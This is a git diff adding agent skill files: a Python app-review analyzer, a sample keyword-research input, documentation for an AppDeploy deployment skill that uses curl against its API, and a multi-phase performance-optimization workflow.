|
||||
"and we'll have a fix in an upcoming update. We appreciate your patience and will notify you "
|
||||
"when it's resolved."
|
||||
}
|
||||
],
|
||||
'feature_request': [
|
||||
{
|
||||
'scenario': 'Feature request received',
|
||||
'template': "Thank you for this suggestion! We're always looking to improve [app_name]. We've added your "
|
||||
"request to our roadmap and will consider it for a future update. Follow us @[social] for "
|
||||
"updates on new features."
|
||||
},
|
||||
{
|
||||
'scenario': 'Feature already planned',
|
||||
'template': "Great news! This feature is already on our roadmap and we're working on it. Stay tuned for "
|
||||
"updates in the coming months. Thanks for your feedback!"
|
||||
}
|
||||
],
|
||||
'positive': [
|
||||
{
|
||||
'scenario': 'Positive review',
|
||||
'template': "Thank you so much for your kind words! We're thrilled that you're enjoying [app_name]. "
|
||||
"Reviews like yours motivate our team to keep improving. If you ever have suggestions, "
|
||||
"we'd love to hear them!"
|
||||
}
|
||||
],
|
||||
'negative_general': [
|
||||
{
|
||||
'scenario': 'General complaint',
|
||||
'template': "We're sorry to hear you're not satisfied with your experience. We'd like to make this right. "
|
||||
"Please contact us at support@[company].com so we can understand the issue better and help "
|
||||
"you directly. Thank you for giving us a chance to improve."
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
return templates.get(issue_category, templates['negative_general'])
|
||||
|
||||
def _calculate_sentiment_score(self, text: str, rating: int) -> float:
|
||||
"""Calculate sentiment score (-1 to 1)."""
|
||||
# Start with rating-based score
|
||||
rating_score = (rating - 3) / 2 # Convert 1-5 to -1 to 1
|
||||
|
||||
# Adjust based on text sentiment
|
||||
positive_count = sum(1 for keyword in self.POSITIVE_KEYWORDS if keyword in text)
|
||||
negative_count = sum(1 for keyword in self.NEGATIVE_KEYWORDS if keyword in text)
|
||||
|
||||
text_score = (positive_count - negative_count) / 10 # Normalize
|
||||
|
||||
# Weighted average (60% rating, 40% text)
|
||||
final_score = (rating_score * 0.6) + (text_score * 0.4)
|
||||
|
||||
return max(min(final_score, 1.0), -1.0)
|
||||
|
||||
def _categorize_sentiment(self, score: float) -> str:
|
||||
"""Categorize sentiment score."""
|
||||
if score > 0.3:
|
||||
return 'positive'
|
||||
elif score < -0.3:
|
||||
return 'negative'
|
||||
else:
|
||||
return 'neutral'
|
||||
|
||||
def _assess_sentiment_trend(self, distribution: Dict[str, float]) -> str:
|
||||
"""Assess overall sentiment trend."""
|
||||
positive = distribution['positive']
|
||||
negative = distribution['negative']
|
||||
|
||||
if positive > 70:
|
||||
return 'very_positive'
|
||||
elif positive > 50:
|
||||
return 'positive'
|
||||
elif negative > 30:
|
||||
return 'concerning'
|
||||
elif negative > 50:
|
||||
return 'critical'
|
||||
else:
|
||||
return 'mixed'
|
||||
|
||||
def _categorize_themes(
|
||||
self,
|
||||
common_words: List[Dict[str, Any]],
|
||||
common_phrases: List[Dict[str, Any]]
|
||||
) -> Dict[str, List[str]]:
|
||||
"""Categorize themes from words and phrases."""
|
||||
themes = {
|
||||
'features': [],
|
||||
'performance': [],
|
||||
'usability': [],
|
||||
'support': [],
|
||||
'pricing': []
|
||||
}
|
||||
|
||||
# Keywords for each category
|
||||
feature_keywords = {'feature', 'functionality', 'option', 'tool'}
|
||||
performance_keywords = {'fast', 'slow', 'crash', 'lag', 'speed', 'performance'}
|
||||
usability_keywords = {'easy', 'difficult', 'intuitive', 'confusing', 'interface', 'design'}
|
||||
support_keywords = {'support', 'help', 'customer', 'service', 'response'}
|
||||
pricing_keywords = {'price', 'cost', 'expensive', 'cheap', 'subscription', 'free'}
|
||||
|
||||
for word_data in common_words:
|
||||
word = word_data['word']
|
||||
if any(kw in word for kw in feature_keywords):
|
||||
themes['features'].append(word)
|
||||
elif any(kw in word for kw in performance_keywords):
|
||||
themes['performance'].append(word)
|
||||
elif any(kw in word for kw in usability_keywords):
|
||||
themes['usability'].append(word)
|
||||
elif any(kw in word for kw in support_keywords):
|
||||
themes['support'].append(word)
|
||||
elif any(kw in word for kw in pricing_keywords):
|
||||
themes['pricing'].append(word)
|
||||
|
||||
return {k: v for k, v in themes.items() if v} # Remove empty categories
|
||||
|
||||
def _generate_theme_insights(self, themes: Dict[str, List[str]]) -> List[str]:
|
||||
"""Generate insights from themes."""
|
||||
insights = []
|
||||
|
||||
for category, keywords in themes.items():
|
||||
if keywords:
|
||||
insights.append(
|
||||
f"{category.title()}: Users frequently mention {', '.join(keywords[:3])}"
|
||||
)
|
||||
|
||||
return insights[:5]
|
||||
|
||||
def _categorize_issues(self, issues: List[Dict[str, Any]]) -> Dict[str, List[Dict[str, Any]]]:
|
||||
"""Categorize issues by type."""
|
||||
categories = {
|
||||
'crashes': [],
|
||||
'bugs': [],
|
||||
'performance': [],
|
||||
'compatibility': []
|
||||
}
|
||||
|
||||
for issue in issues:
|
||||
keywords = issue['issue_keywords']
|
||||
|
||||
if 'crash' in keywords or 'freezes' in keywords:
|
||||
categories['crashes'].append(issue)
|
||||
elif 'bug' in keywords or 'error' in keywords or 'broken' in keywords:
|
||||
categories['bugs'].append(issue)
|
||||
elif 'slow' in keywords or 'laggy' in keywords:
|
||||
categories['performance'].append(issue)
|
||||
else:
|
||||
categories['compatibility'].append(issue)
|
||||
|
||||
return {k: v for k, v in categories.items() if v}
|
||||
|
||||
def _calculate_issue_severity(
|
||||
self,
|
||||
categorized_issues: Dict[str, List[Dict[str, Any]]],
|
||||
total_reviews: int
|
||||
) -> Dict[str, Dict[str, Any]]:
|
||||
"""Calculate severity scores for each issue category."""
|
||||
severity_scores = {}
|
||||
|
||||
for category, issues in categorized_issues.items():
|
||||
count = len(issues)
|
||||
percentage = (count / total_reviews) * 100 if total_reviews > 0 else 0
|
||||
|
||||
# Calculate average rating of affected reviews
|
||||
avg_rating = sum(i['rating'] for i in issues) / count if count > 0 else 0
|
||||
|
||||
# Severity score (0-100)
|
||||
severity = min((percentage * 10) + ((5 - avg_rating) * 10), 100)
|
||||
|
||||
severity_scores[category] = {
|
||||
'count': count,
|
||||
'percentage': round(percentage, 2),
|
||||
'average_rating': round(avg_rating, 2),
|
||||
'severity_score': round(severity, 1),
|
||||
'priority': 'critical' if severity > 70 else ('high' if severity > 40 else 'medium')
|
||||
}
|
||||
|
||||
return severity_scores
|
||||
|
||||
def _rank_issues_by_severity(
|
||||
self,
|
||||
severity_scores: Dict[str, Dict[str, Any]]
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Rank issues by severity score."""
|
||||
ranked = sorted(
|
||||
[{'category': cat, **data} for cat, data in severity_scores.items()],
|
||||
key=lambda x: x['severity_score'],
|
||||
reverse=True
|
||||
)
|
||||
return ranked
|
||||
|
||||
def _generate_issue_recommendations(
|
||||
self,
|
||||
categorized_issues: Dict[str, List[Dict[str, Any]]],
|
||||
severity_scores: Dict[str, Dict[str, Any]]
|
||||
) -> List[str]:
|
||||
"""Generate recommendations for addressing issues."""
|
||||
recommendations = []
|
||||
|
||||
for category, score_data in severity_scores.items():
|
||||
if score_data['priority'] == 'critical':
|
||||
recommendations.append(
|
||||
f"URGENT: Address {category} issues immediately - affecting {score_data['percentage']}% of reviews"
|
||||
)
|
||||
elif score_data['priority'] == 'high':
|
||||
recommendations.append(
|
||||
f"HIGH PRIORITY: Focus on {category} issues in next update"
|
||||
)
|
||||
|
||||
return recommendations
|
||||
|
||||
def _extract_feature_request_text(self, text: str) -> str:
|
||||
"""Extract the specific feature request from review text."""
|
||||
# Simple extraction - find sentence with feature request keywords
|
||||
sentences = text.split('.')
|
||||
for sentence in sentences:
|
||||
if any(keyword in sentence for keyword in self.FEATURE_REQUEST_KEYWORDS):
|
||||
return sentence.strip()
|
||||
return text[:100] # Fallback
|
||||
|
||||
def _cluster_feature_requests(
|
||||
self,
|
||||
feature_requests: List[Dict[str, Any]]
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Cluster similar feature requests."""
|
||||
# Simplified clustering - group by common keywords
|
||||
clusters = {}
|
||||
|
||||
for request in feature_requests:
|
||||
text = request['request_text'].lower()
|
||||
# Extract key words
|
||||
words = [w for w in text.split() if len(w) > 4]
|
||||
|
||||
# Try to find matching cluster
|
||||
matched = False
|
||||
for cluster_key in clusters:
|
||||
if any(word in cluster_key for word in words[:3]):
|
||||
clusters[cluster_key].append(request)
|
||||
matched = True
|
||||
break
|
||||
|
||||
if not matched and words:
|
||||
cluster_key = ' '.join(words[:2])
|
||||
clusters[cluster_key] = [request]
|
||||
|
||||
return [
|
||||
{'feature_theme': theme, 'request_count': len(requests), 'examples': requests[:3]}
|
||||
for theme, requests in clusters.items()
|
||||
]
|
||||
|
||||
def _prioritize_feature_requests(
|
||||
self,
|
||||
clustered_requests: List[Dict[str, Any]]
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Prioritize feature requests by frequency."""
|
||||
return sorted(
|
||||
clustered_requests,
|
||||
key=lambda x: x['request_count'],
|
||||
reverse=True
|
||||
)[:10]
|
||||
|
||||
def _generate_feature_recommendations(
|
||||
self,
|
||||
prioritized_requests: List[Dict[str, Any]]
|
||||
) -> List[str]:
|
||||
"""Generate recommendations for feature requests."""
|
||||
recommendations = []
|
||||
|
||||
if prioritized_requests:
|
||||
top_request = prioritized_requests[0]
|
||||
recommendations.append(
|
||||
f"Most requested feature: {top_request['feature_theme']} "
|
||||
f"({top_request['request_count']} mentions) - consider for next major release"
|
||||
)
|
||||
|
||||
if len(prioritized_requests) > 1:
|
||||
recommendations.append(
|
||||
f"Also consider: {prioritized_requests[1]['feature_theme']}"
|
||||
)
|
||||
|
||||
return recommendations
|
||||
|
||||
def _determine_trend_direction(
|
||||
self,
|
||||
rating_change: float,
|
||||
sentiment_change: float
|
||||
) -> str:
|
||||
"""Determine overall trend direction."""
|
||||
if rating_change > 0.2 and sentiment_change > 5:
|
||||
return 'improving'
|
||||
elif rating_change < -0.2 and sentiment_change < -5:
|
||||
return 'declining'
|
||||
else:
|
||||
return 'stable'
|
||||
|
||||
def _generate_trend_insights(
|
||||
self,
|
||||
trends: List[Dict[str, Any]],
|
||||
trend_direction: str
|
||||
) -> List[str]:
|
||||
"""Generate insights from trend analysis."""
|
||||
insights = []
|
||||
|
||||
if trend_direction == 'improving':
|
||||
insights.append("Positive trend: User satisfaction is increasing over time")
|
||||
elif trend_direction == 'declining':
|
||||
insights.append("WARNING: User satisfaction is declining - immediate action needed")
|
||||
else:
|
||||
insights.append("Sentiment is stable - maintain current quality")
|
||||
|
||||
# Review velocity insight
|
||||
if len(trends) >= 2:
|
||||
recent_reviews = trends[-1]['total_reviews']
|
||||
previous_reviews = trends[-2]['total_reviews']
|
||||
|
||||
if recent_reviews > previous_reviews * 1.5:
|
||||
insights.append("Review volume increasing - growing user base or recent controversy")
|
||||
|
||||
return insights
|
||||
|
||||
|
||||
def analyze_reviews(
|
||||
app_name: str,
|
||||
reviews: List[Dict[str, Any]]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to perform comprehensive review analysis.
|
||||
|
||||
Args:
|
||||
app_name: App name
|
||||
reviews: List of review dictionaries
|
||||
|
||||
Returns:
|
||||
Complete review analysis
|
||||
"""
|
||||
analyzer = ReviewAnalyzer(app_name)
|
||||
|
||||
return {
|
||||
'sentiment_analysis': analyzer.analyze_sentiment(reviews),
|
||||
'common_themes': analyzer.extract_common_themes(reviews),
|
||||
'issues_identified': analyzer.identify_issues(reviews),
|
||||
'feature_requests': analyzer.find_feature_requests(reviews)
|
||||
}
|
||||
30
packages/llm/skills/app-store-optimization/sample_input.json
Normal file
30
packages/llm/skills/app-store-optimization/sample_input.json
Normal file
@ -0,0 +1,30 @@
|
||||
{
|
||||
"request_type": "keyword_research",
|
||||
"app_info": {
|
||||
"name": "TaskFlow Pro",
|
||||
"category": "Productivity",
|
||||
"target_audience": "Professionals aged 25-45 working in teams",
|
||||
"key_features": [
|
||||
"AI-powered task prioritization",
|
||||
"Team collaboration tools",
|
||||
"Calendar integration",
|
||||
"Cross-platform sync"
|
||||
],
|
||||
"unique_value": "AI automatically prioritizes your tasks based on deadlines and importance"
|
||||
},
|
||||
"target_keywords": [
|
||||
"task manager",
|
||||
"productivity app",
|
||||
"todo list",
|
||||
"team collaboration",
|
||||
"project management"
|
||||
],
|
||||
"competitors": [
|
||||
"Todoist",
|
||||
"Any.do",
|
||||
"Microsoft To Do",
|
||||
"Things 3"
|
||||
],
|
||||
"platform": "both",
|
||||
"language": "en-US"
|
||||
}
|
||||
205
packages/llm/skills/appdeploy/SKILL.md
Normal file
205
packages/llm/skills/appdeploy/SKILL.md
Normal file
@ -0,0 +1,205 @@
|
||||
---
|
||||
name: appdeploy
|
||||
description: "Deploy web apps with backend APIs, database, and file storage. Use when the user asks to deploy or publish a website or web app and wants a public URL. Uses HTTP API via curl."
|
||||
risk: safe
|
||||
source: "AppDeploy (MIT)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AppDeploy Skill
|
||||
|
||||
Deploy web apps to AppDeploy via HTTP API.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
- Use when planning or building apps and web apps
|
||||
- Use when deploying an app to a public URL
|
||||
- Use when publishing a website or web app
|
||||
- Use when the user says "deploy this", "make this live", or "give me a URL"
|
||||
- Use when updating an already-deployed app
|
||||
|
||||
## Setup (First Time Only)
|
||||
|
||||
1. **Check for existing API key:**
|
||||
- Look for a `.appdeploy` file in the project root
|
||||
- If it exists and contains a valid `api_key`, skip to Usage
|
||||
|
||||
2. **If no API key exists, register and get one:**
|
||||
```bash
|
||||
curl -X POST https://api-v2.appdeploy.ai/mcp/api-key \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"client_name": "claude-code"}'
|
||||
```
|
||||
|
||||
Response:
|
||||
```json
|
||||
{
|
||||
"api_key": "ak_...",
|
||||
"user_id": "agent-claude-code-a1b2c3d4",
|
||||
"created_at": 1234567890,
|
||||
"message": "Save this key securely - it cannot be retrieved later"
|
||||
}
|
||||
```
|
||||
|
||||
3. **Save credentials to `.appdeploy`:**
|
||||
```json
|
||||
{
|
||||
"api_key": "ak_...",
|
||||
"endpoint": "https://api-v2.appdeploy.ai/mcp"
|
||||
}
|
||||
```
|
||||
|
||||
Add `.appdeploy` to `.gitignore` if not already present.
|
||||
|
||||
## Usage
|
||||
|
||||
Make JSON-RPC calls to the MCP endpoint:
|
||||
|
||||
```bash
|
||||
curl -X POST {endpoint} \
|
||||
-H "Content-Type: application/json" \
|
||||
-H "Accept: application/json, text/event-stream" \
|
||||
-H "Authorization: Bearer {api_key}" \
|
||||
-d '{
|
||||
"jsonrpc": "2.0",
|
||||
"id": 1,
|
||||
"method": "tools/call",
|
||||
"params": {
|
||||
"name": "{tool_name}",
|
||||
"arguments": { ... }
|
||||
}
|
||||
}'
|
||||
```
|
||||
|
||||
## Workflow
|
||||
|
||||
1. **First, get deployment instructions:**
|
||||
Call `get_deploy_instructions` to understand constraints and requirements.
|
||||
|
||||
2. **Get the app template:**
|
||||
Call `get_app_template` with your chosen `app_type` and `frontend_template`.
|
||||
|
||||
3. **Deploy the app:**
|
||||
Call `deploy_app` with your app files. For new apps, set `app_id` to `null`.
|
||||
|
||||
4. **Check deployment status:**
|
||||
Call `get_app_status` to check if the build succeeded.
|
||||
|
||||
5. **View/manage your apps:**
|
||||
Use `get_apps` to list your deployed apps.
|
||||
|
||||
## Available Tools
|
||||
|
||||
### get_deploy_instructions
|
||||
|
||||
Use this when you are about to call deploy_app in order to get the deployment constraints and hard rules. You must call this tool before starting to generate any code. This tool returns instructions only and does not deploy anything.
|
||||
|
||||
**Parameters:**
|
||||
|
||||
|
||||
### deploy_app
|
||||
|
||||
Use this when the user asks to deploy or publish a website or web app and wants a public URL.
|
||||
Before generating files or calling this tool, you must call get_deploy_instructions and follow its constraints.
|
||||
|
||||
**Parameters:**
|
||||
- `app_id`: any (required) - existing app id to update, or null for new app
|
||||
- `app_type`: string (required) - app architecture: frontend-only or frontend+backend
|
||||
- `app_name`: string (required) - short display name
|
||||
- `description`: string (optional) - short description of what the app does
|
||||
- `frontend_template`: any (optional) - REQUIRED when app_id is null. One of: 'html-static' (simple sites), 'react-vite' (SPAs, games), 'nextjs-static' (multi-page). Template files auto-included.
|
||||
- `files`: array (optional) - Files to write. NEW APPS: only custom files + diffs to template files. UPDATES: only changed files using diffs[]. At least one of files[] or deletePaths[] required.
|
||||
- `deletePaths`: array (optional) - Paths to delete. ONLY for updates (app_id required). Cannot delete package.json or framework entry points.
|
||||
- `model`: string (required) - The coding agent model used for this deployment, to the best of your knowledge. Examples: 'codex-5.3', 'chatgpt', 'opus 4.6', 'claude-sonnet-4-5', 'gemini-2.5-pro'
|
||||
- `intent`: string (required) - The intent of this deployment. User-initiated examples: 'initial app deploy', 'bugfix - ui is too noisy'. Agent-initiated examples: 'agent fixing deployment error', 'agent retry after lint failure'
|
||||
|
||||
### get_app_template
|
||||
|
||||
Call get_deploy_instructions first. Then call this once you've decided app_type and frontend_template. Returns base app template and SDK types. Template files auto-included in deploy_app.
|
||||
|
||||
**Parameters:**
|
||||
- `app_type`: string (required)
|
||||
- `frontend_template`: string (required) - Frontend framework: 'html-static' - Simple sites, minimal framework; 'react-vite' - React SPAs, dashboards, games; 'nextjs-static' - Multi-page apps, SSG
|
||||
|
||||
### get_app_status
|
||||
|
||||
Use this when deploy_app tool call returns or when the user asks to check the deployment status of an app, or reports that the app has errors or is not working as expected. Returns deployment status (in-progress: 'deploying'/'deleting', terminal: 'ready'/'failed'/'deleted'), QA snapshot (frontend/network errors), and live frontend/backend error logs.
|
||||
|
||||
**Parameters:**
|
||||
- `app_id`: string (required) - Target app id
|
||||
- `since`: integer (optional) - Optional timestamp in epoch milliseconds to filter errors. When provided, returns only errors since that timestamp.
|
||||
|
||||
### delete_app
|
||||
|
||||
Use this when you want to permanently delete an app. Use only on explicit user request. This is irreversible; after deletion, status checks will return not found.
|
||||
|
||||
**Parameters:**
|
||||
- `app_id`: string (required) - Target app id
|
||||
|
||||
### get_app_versions
|
||||
|
||||
List deployable versions for an existing app. Requires app_id. Returns newest-first {name, version, timestamp} items. Display 'name' to users. DO NOT display the 'version' value to users. Timestamp values MUST be converted to user's local time
|
||||
|
||||
**Parameters:**
|
||||
- `app_id`: string (required) - Target app id
|
||||
|
||||
### apply_app_version
|
||||
|
||||
Start deploying an existing app at a specific version. Use the 'version' value (not 'name') from get_app_versions. Returns true if accepted and deployment started; use get_app_status to observe completion.
|
||||
|
||||
**Parameters:**
|
||||
- `app_id`: string (required) - Target app id
|
||||
- `version`: string (required) - Version id to apply
|
||||
|
||||
### src_glob
|
||||
|
||||
Use this when you need to discover files in an app's source snapshot. Returns file paths matching a glob pattern (no content). Useful for exploring project structure before reading or searching files.
|
||||
|
||||
**Parameters:**
|
||||
- `app_id`: string (required) - Target app id
|
||||
- `version`: string (optional) - Version to inspect (defaults to applied version)
|
||||
- `path`: string (optional) - Directory path to search within
|
||||
- `glob`: string (optional) - Glob pattern to match files (default: **/*)
|
||||
- `include_dirs`: boolean (optional) - Include directory paths in results
|
||||
- `continuation_token`: string (optional) - Token from previous response for pagination
|
||||
|
||||
### src_grep
|
||||
|
||||
Use this when you need to search for patterns in an app's source code. Returns matching lines with optional context. Supports regex patterns, glob filters, and multiple output modes.
|
||||
|
||||
**Parameters:**
|
||||
- `app_id`: string (required) - Target app id
|
||||
- `version`: string (optional) - Version to search (defaults to applied version)
|
||||
- `pattern`: string (required) - Regex pattern to search for (max 500 chars)
|
||||
- `path`: string (optional) - Directory path to search within
|
||||
- `glob`: string (optional) - Glob pattern to filter files (e.g., '*.ts')
|
||||
- `case_insensitive`: boolean (optional) - Enable case-insensitive matching
|
||||
- `output_mode`: string (optional) - content=matching lines, files_with_matches=file paths only, count=match count per file
|
||||
- `before_context`: integer (optional) - Lines to show before each match (0-20)
|
||||
- `after_context`: integer (optional) - Lines to show after each match (0-20)
|
||||
- `context`: integer (optional) - Lines before and after (overrides before/after_context)
|
||||
- `line_numbers`: boolean (optional) - Include line numbers in output
|
||||
- `max_file_size`: integer (optional) - Max file size to scan in bytes (default 10MB)
|
||||
- `continuation_token`: string (optional) - Token from previous response for pagination
|
||||
|
||||
### src_read
|
||||
|
||||
Use this when you need to read a specific file from an app's source snapshot. Returns file content with line-based pagination (offset/limit). Handles both text and binary files.
|
||||
|
||||
**Parameters:**
|
||||
- `app_id`: string (required) - Target app id
|
||||
- `version`: string (optional) - Version to read from (defaults to applied version)
|
||||
- `file_path`: string (required) - Path to the file to read
|
||||
- `offset`: integer (optional) - Line offset to start reading from (0-indexed)
|
||||
- `limit`: integer (optional) - Number of lines to return (max 2000)
|
||||
|
||||
### get_apps
|
||||
|
||||
Use this when you need to list apps owned by the current user. Returns app details with display fields for user presentation and data fields for tool chaining.
|
||||
|
||||
**Parameters:**
|
||||
- `continuation_token`: string (optional) - Token for pagination
|
||||
|
||||
|
||||
---
|
||||
*Generated by `scripts/generate-appdeploy-skill.ts`*
|
||||
@ -0,0 +1,157 @@
|
||||
---
|
||||
name: application-performance-performance-optimization
|
||||
description: "Optimize end-to-end application performance with profiling, observability, and backend/frontend tuning. Use when coordinating performance optimization across the stack."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
Optimize application performance end-to-end using specialized performance and optimization agents:
|
||||
|
||||
[Extended thinking: This workflow orchestrates a comprehensive performance optimization process across the entire application stack. Starting with deep profiling and baseline establishment, the workflow progresses through targeted optimizations in each system layer, validates improvements through load testing, and establishes continuous monitoring for sustained performance. Each phase builds on insights from previous phases, creating a data-driven optimization strategy that addresses real bottlenecks rather than theoretical improvements. The workflow emphasizes modern observability practices, user-centric performance metrics, and cost-effective optimization strategies.]
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Coordinating performance optimization across backend, frontend, and infrastructure
|
||||
- Establishing baselines and profiling to identify bottlenecks
|
||||
- Designing load tests, performance budgets, or capacity plans
|
||||
- Building observability for performance and reliability targets
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- The task is a small localized fix with no broader performance goals
|
||||
- There is no access to metrics, tracing, or profiling data
|
||||
- The request is unrelated to performance or scalability
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Confirm performance goals, constraints, and target metrics.
|
||||
2. Establish baselines with profiling, tracing, and real-user data.
|
||||
3. Execute phased optimizations across the stack with measurable impact.
|
||||
4. Validate improvements and set guardrails to prevent regressions.
|
||||
|
||||
## Safety
|
||||
|
||||
- Avoid load testing production without approvals and safeguards.
|
||||
- Roll out performance changes gradually with rollback plans.
|
||||
|
||||
## Phase 1: Performance Profiling & Baseline
|
||||
|
||||
### 1. Comprehensive Performance Profiling
|
||||
|
||||
- Use Task tool with subagent_type="performance-engineer"
|
||||
- Prompt: "Profile application performance comprehensively for: $ARGUMENTS. Generate flame graphs for CPU usage, heap dumps for memory analysis, trace I/O operations, and identify hot paths. Use APM tools like DataDog or New Relic if available. Include database query profiling, API response times, and frontend rendering metrics. Establish performance baselines for all critical user journeys."
|
||||
- Context: Initial performance investigation
|
||||
- Output: Detailed performance profile with flame graphs, memory analysis, bottleneck identification, baseline metrics
|
||||
|
||||
### 2. Observability Stack Assessment
|
||||
|
||||
- Use Task tool with subagent_type="observability-engineer"
|
||||
- Prompt: "Assess current observability setup for: $ARGUMENTS. Review existing monitoring, distributed tracing with OpenTelemetry, log aggregation, and metrics collection. Identify gaps in visibility, missing metrics, and areas needing better instrumentation. Recommend APM tool integration and custom metrics for business-critical operations."
|
||||
- Context: Performance profile from step 1
|
||||
- Output: Observability assessment report, instrumentation gaps, monitoring recommendations
|
||||
|
||||
### 3. User Experience Analysis
|
||||
|
||||
- Use Task tool with subagent_type="performance-engineer"
|
||||
- Prompt: "Analyze user experience metrics for: $ARGUMENTS. Measure Core Web Vitals (LCP, FID, CLS), page load times, time to interactive, and perceived performance. Use Real User Monitoring (RUM) data if available. Identify user journeys with poor performance and their business impact."
|
||||
- Context: Performance baselines from step 1
|
||||
- Output: UX performance report, Core Web Vitals analysis, user impact assessment
|
||||
|
||||
## Phase 2: Database & Backend Optimization
|
||||
|
||||
### 4. Database Performance Optimization
|
||||
|
||||
- Use Task tool with subagent_type="database-cloud-optimization::database-optimizer"
|
||||
- Prompt: "Optimize database performance for: $ARGUMENTS based on profiling data: {context_from_phase_1}. Analyze slow query logs, create missing indexes, optimize execution plans, implement query result caching with Redis/Memcached. Review connection pooling, prepared statements, and batch processing opportunities. Consider read replicas and database sharding if needed."
|
||||
- Context: Performance bottlenecks from phase 1
|
||||
- Output: Optimized queries, new indexes, caching strategy, connection pool configuration
|
||||
|
||||
### 5. Backend Code & API Optimization
|
||||
|
||||
- Use Task tool with subagent_type="backend-development::backend-architect"
|
||||
- Prompt: "Optimize backend services for: $ARGUMENTS targeting bottlenecks: {context_from_phase_1}. Implement efficient algorithms, add application-level caching, optimize N+1 queries, use async/await patterns effectively. Implement pagination, response compression, GraphQL query optimization, and batch API operations. Add circuit breakers and bulkheads for resilience."
|
||||
- Context: Database optimizations from step 4, profiling data from phase 1
|
||||
- Output: Optimized backend code, caching implementation, API improvements, resilience patterns
|
||||
|
||||
### 6. Microservices & Distributed System Optimization
|
||||
|
||||
- Use Task tool with subagent_type="performance-engineer"
|
||||
- Prompt: "Optimize distributed system performance for: $ARGUMENTS. Analyze service-to-service communication, implement service mesh optimizations, optimize message queue performance (Kafka/RabbitMQ), reduce network hops. Implement distributed caching strategies and optimize serialization/deserialization."
|
||||
- Context: Backend optimizations from step 5
|
||||
- Output: Service communication improvements, message queue optimization, distributed caching setup
|
||||
|
||||
## Phase 3: Frontend & CDN Optimization
|
||||
|
||||
### 7. Frontend Bundle & Loading Optimization
|
||||
|
||||
- Use Task tool with subagent_type="frontend-developer"
|
||||
- Prompt: "Optimize frontend performance for: $ARGUMENTS targeting Core Web Vitals: {context_from_phase_1}. Implement code splitting, tree shaking, lazy loading, and dynamic imports. Optimize bundle sizes with webpack/rollup analysis. Implement resource hints (prefetch, preconnect, preload). Optimize critical rendering path and eliminate render-blocking resources."
|
||||
- Context: UX analysis from phase 1, backend optimizations from phase 2
|
||||
- Output: Optimized bundles, lazy loading implementation, improved Core Web Vitals
|
||||
|
||||
### 8. CDN & Edge Optimization
|
||||
|
||||
- Use Task tool with subagent_type="cloud-infrastructure::cloud-architect"
|
||||
- Prompt: "Optimize CDN and edge performance for: $ARGUMENTS. Configure CloudFlare/CloudFront for optimal caching, implement edge functions for dynamic content, set up image optimization with responsive images and WebP/AVIF formats. Configure HTTP/2 and HTTP/3, implement Brotli compression. Set up geographic distribution for global users."
|
||||
- Context: Frontend optimizations from step 7
|
||||
- Output: CDN configuration, edge caching rules, compression setup, geographic optimization
|
||||
|
||||
### 9. Mobile & Progressive Web App Optimization
|
||||
|
||||
- Use Task tool with subagent_type="frontend-mobile-development::mobile-developer"
|
||||
- Prompt: "Optimize mobile experience for: $ARGUMENTS. Implement service workers for offline functionality, optimize for slow networks with adaptive loading. Reduce JavaScript execution time for mobile CPUs. Implement virtual scrolling for long lists. Optimize touch responsiveness and smooth animations. Consider React Native/Flutter specific optimizations if applicable."
|
||||
- Context: Frontend optimizations from steps 7-8
|
||||
- Output: Mobile-optimized code, PWA implementation, offline functionality
|
||||
|
||||
## Phase 4: Load Testing & Validation
|
||||
|
||||
### 10. Comprehensive Load Testing
|
||||
|
||||
- Use Task tool with subagent_type="performance-engineer"
|
||||
- Prompt: "Conduct comprehensive load testing for: $ARGUMENTS using k6/Gatling/Artillery. Design realistic load scenarios based on production traffic patterns. Test normal load, peak load, and stress scenarios. Include API testing, browser-based testing, and WebSocket testing if applicable. Measure response times, throughput, error rates, and resource utilization at various load levels."
|
||||
- Context: All optimizations from phases 1-3
|
||||
- Output: Load test results, performance under load, breaking points, scalability analysis
|
||||
|
||||
### 11. Performance Regression Testing
|
||||
|
||||
- Use Task tool with subagent_type="performance-testing-review::test-automator"
|
||||
- Prompt: "Create automated performance regression tests for: $ARGUMENTS. Set up performance budgets for key metrics, integrate with CI/CD pipeline using GitHub Actions or similar. Create Lighthouse CI tests for frontend, API performance tests with Artillery, and database performance benchmarks. Implement automatic rollback triggers for performance regressions."
|
||||
- Context: Load test results from step 10, baseline metrics from phase 1
|
||||
- Output: Performance test suite, CI/CD integration, regression prevention system
|
||||
|
||||
## Phase 5: Monitoring & Continuous Optimization
|
||||
|
||||
### 12. Production Monitoring Setup
|
||||
|
||||
- Use Task tool with subagent_type="observability-engineer"
|
||||
- Prompt: "Implement production performance monitoring for: $ARGUMENTS. Set up APM with DataDog/New Relic/Dynatrace, configure distributed tracing with OpenTelemetry, implement custom business metrics. Create Grafana dashboards for key metrics, set up PagerDuty alerts for performance degradation. Define SLIs/SLOs for critical services with error budgets."
|
||||
- Context: Performance improvements from all previous phases
|
||||
- Output: Monitoring dashboards, alert rules, SLI/SLO definitions, runbooks
|
||||
|
||||
### 13. Continuous Performance Optimization
|
||||
|
||||
- Use Task tool with subagent_type="performance-engineer"
|
||||
- Prompt: "Establish continuous optimization process for: $ARGUMENTS. Create performance budget tracking, implement A/B testing for performance changes, set up continuous profiling in production. Document optimization opportunities backlog, create capacity planning models, and establish regular performance review cycles."
|
||||
- Context: Monitoring setup from step 12, all previous optimization work
|
||||
- Output: Performance budget tracking, optimization backlog, capacity planning, review process
|
||||
|
||||
## Configuration Options
|
||||
|
||||
- **performance_focus**: "latency" | "throughput" | "cost" | "balanced" (default: "balanced")
|
||||
- **optimization_depth**: "quick-wins" | "comprehensive" | "enterprise" (default: "comprehensive")
|
||||
- **tools_available**: ["datadog", "newrelic", "prometheus", "grafana", "k6", "gatling"]
|
||||
- **budget_constraints**: Set maximum acceptable costs for infrastructure changes
|
||||
- **user_impact_tolerance**: "zero-downtime" | "maintenance-window" | "gradual-rollout"
|
||||
|
||||
